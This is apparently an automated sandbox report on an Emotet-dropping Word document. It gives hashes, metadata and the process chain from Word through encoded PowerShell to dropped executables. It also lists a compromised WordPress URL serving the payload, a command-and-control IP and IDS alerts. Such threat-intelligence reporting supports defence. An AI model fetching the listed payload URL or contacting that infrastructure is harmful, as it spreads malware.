Field | Value
---|---
File name | Archivo_18-09-2019 940233.doc
Full analysis | https://app.any.run/tasks/3fa75e33-a920-468f-bf5a-0e542d37b7e8
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a highly destructive piece of malware. It targets mostly corporate victims, but private users are also infected through mass spam email campaigns.
Analysis date | September 18, 2019, 16:42:37
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vision-oriented Technician bypass, Subject: teal, Author: Ludwig Connelly, Comments: Factors, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5 | BBB6CA9833AC1EAFA81E3864748EB52B
SHA1 | 5FE0016FD99F83150FB574B864C281FA405E456B
SHA256 | E22A9596F5F82E75FEB46AB5C8690F25842FE03D03AA9CCE41E9D8BA301268FE
SSDEEP | 6144:TzyxNRIIt1POT3XtwNJ6mdZPLkIZ7NSU4jJntATfDWGPy4XSKe:TzyxNRIIt1POT3XtwNJ6mdpXZ7NSU4V/

Extension | Detected type (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

Field | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
Manager | Medhurst
HeadingPairs | -
TitleOfParts | -
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | 641
Paragraphs | 1
Lines | 4
Company | Mraz, Nader and Feil
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | 547
Words | 95
Pages | 1
ModifyDate | 2019:09:18 14:38:00
CreateDate | 2019:09:18 14:38:00
TotalEditTime | -
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | -
Template | Normal.dotm
Comments | Factors
Keywords | -
Author | Ludwig Connelly
Subject | teal
Title | Vision-oriented Technician bypass

PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2856 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Archivo_18-09-2019 940233.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3964 | powershell -encod [encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3396 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2664 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2768 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3576 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3104 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
552 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
924 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2664 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe | User: admin; Integrity Level: MEDIUM

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9EF4.tmp.cvr | — | — | —
2856 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | CD0929FDC6545C244CB285B22558DE27 | 4F0C83A3FE87834B4FE11EE04E1367F736F25C3034A92327199430EDC9366CAD
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 0D64A4AEAC6572AC3FB0EE47E94EB2EA | 11D5A9C0B3EFD2FAE601D8223F5976B4ADCFF1EAFFBADBAD07C7430313A5D47E
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DDDFCDB.wmf | wmf | 4F9623B6E4D73C98B6EE1D305B894DF0 | E01D16C354DA14EF703AC03757CA38E974A5AA6A89D36D8F4FD9A03C2D05FFF5
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A67B968F.wmf | wmf | 9F1F3445CDA70314899C48D0E3D4CC30 | D30851ED755944F401E0EC7D0D8B2E725A8011CB20B2D9F7E71015FCC800AC9A
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74D97C2E.wmf | wmf | 3AFACB6E50189306E743E775F890B26D | 2003EE0D9506E43CF74933274F3ADD06EC574E474101EC38E94C4ED6242852A7
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C80D1D4B.wmf | wmf | BE149EF4A7E4875DEC9B4B8A8E52D0B0 | 1CE8F318DCD9AEE95851428924D17C982219B3BD2EB9CE0DAC1C93076BDDBF97
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$chivo_18-09-2019 940233.doc | pgc | D235637F3BA57EADAD93191138586BDE | 4CDC9EFA3B002D0CE1422A88609DDC7762A30609F7DCEFC825657D65155312EF
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73DED57D.wmf | wmf | 5C4F83E134A72503FCF81E7E63F4F4AD | E6B63B63938C82998B52AB441245F483F24AF2CAE8C6CC60DBF4A5E8CB491F7D
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\985CE86C.wmf | wmf | 38DB4ACEB80EDB705160C20F778708A3 | F9660711F6A14A1CC7E1B6B8B377FFEC36E9C9F9C79B0EB70356987CCF642944

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
3964 | powershell.exe | GET | 200 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | executable | 400 Kb | suspicious

PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
3964 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious
2664 | easywindow.exe | 189.129.4.186:80 | — | Uninet S.A. de C.V. | MX | malicious

Domain | IP | Reputation
---|---|---
thinhvuongmedia.com | — | suspicious

PID | Process | Class | Message
---|---|---|---
3964 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3964 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3964 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3964 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2664 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2664 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |